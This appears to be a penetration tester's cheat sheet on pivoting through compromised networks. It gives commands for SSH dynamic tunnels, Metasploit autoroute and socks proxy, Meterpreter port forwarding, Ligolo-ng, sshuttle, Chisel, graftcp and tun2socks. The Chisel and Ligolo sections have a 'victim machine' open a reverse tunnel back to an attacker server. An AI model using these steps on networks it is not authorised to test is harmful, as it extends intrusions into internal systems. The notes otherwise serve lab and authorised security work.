Pivoting

Tools and Techniques

SSH

# Dynamic ssh-tunnel
ssh -D localhost:9050 -f -N <USER>@<DOMAIN>
# Run commands with proxychains <Command>
# Not all tools are proxy aware

Metasploit

• Socks Proxy

Meterpreter> run autoroute -s 172.16.2.0/24
background
use auxiliary/server/socks_proxy
set SRVPORT 9050
run

• Portforward

# Forward remote port 22 to localhost port 1337
Meterpreter> portfwd add -r 172.16.2.5 -p 22 -L 127.0.0.1 -l 1337

Ligolo-ng

Setup

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo

• Server

./proxy -selfcert

• Client

./agent -connect <SERVER-IP>:11601 -ignore-cert

sshuttle

Acting as a VPN, we can access hosts without using proxychains.

sshuttle [--dns] -vr root@10.10.110.100 0/0 --ssh-cmd 'ssh -i 10.10.110.100/root-id-rsa' -D

Cons: No internet access on HTB

Proxychains don't work with golang binaries as it uses LDPRELOAD to hijack linked library calls, while golang doesn't use them.

Check: graftcp, tun2socks below

Chisel

Installation

go install github.com/jpillora/chisel@latest

• Server

# On attacker machine
./chisel server --reverse --port 54321

• Client

# On victim machine
./chisel client <SERVER>:54321 R:127.0.0.1:9050:socks

The server and Client must be the same version

• Reference

  • https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel

Graftcp

graftcp can redirect the TCP connection made by the program [application, script, shell, etc.] to SOCKS5 or HTTP proxy.

Compared with tsocks, proxychains, or proxychains-ng, graftcp is not using the LD_PRELOAD trick which only works for dynamically linked programs, e.g., applications built by Go can not be hooked by proxychains-ng. graftcp can trace or modify any given programs connected by ptrace(2)

Installation

wget https://github.com/hmgle/graftcp/releases/download/v0.4.0/graftcp_0.4.0-1_amd64.deb
sudo dpkg -i ./graftcp_0.4.0-1_amd64.deb

Usage

sudo graftcp-local -socks5 127.0.0.1:9050
graftcp <Program>

# Alternatively
sudo mgraftcp --socks5 127.0.0.1:9050 <Program>

Check the repository for more instructions.

Tun2socks

• Proxy Everything: Handle all network traffic of any internet programs sent by the device through a proxy.

• Proxy Protocols: HTTP/Socks4/Socks5/Shadowsocks with authentication support for remote connections.

• Run Everywhere: Linux/macOS/Windows/FreeBSD/OpenBSD multi-platform support with specific optimization.

• Gateway Mode: Act as a layer three gateway to handle network traffic from other devices in the same network.

• Full IPv6 Support: All functions work in IPv6, tunnel IPv4 connections through IPv6 proxy and vice versa.

• Network Stack: Powered by user-space TCP/IP stack from Google container application kernel gVisor.

Installation

go install github.com/xjasonlyu/tun2socks/v2@latest

Usage

sudo `which tun2socks` -device tun://tun1 -proxy socks5://127.0.0.1:9050
ip link set tun1 up
ip route add <destination network> dev tun1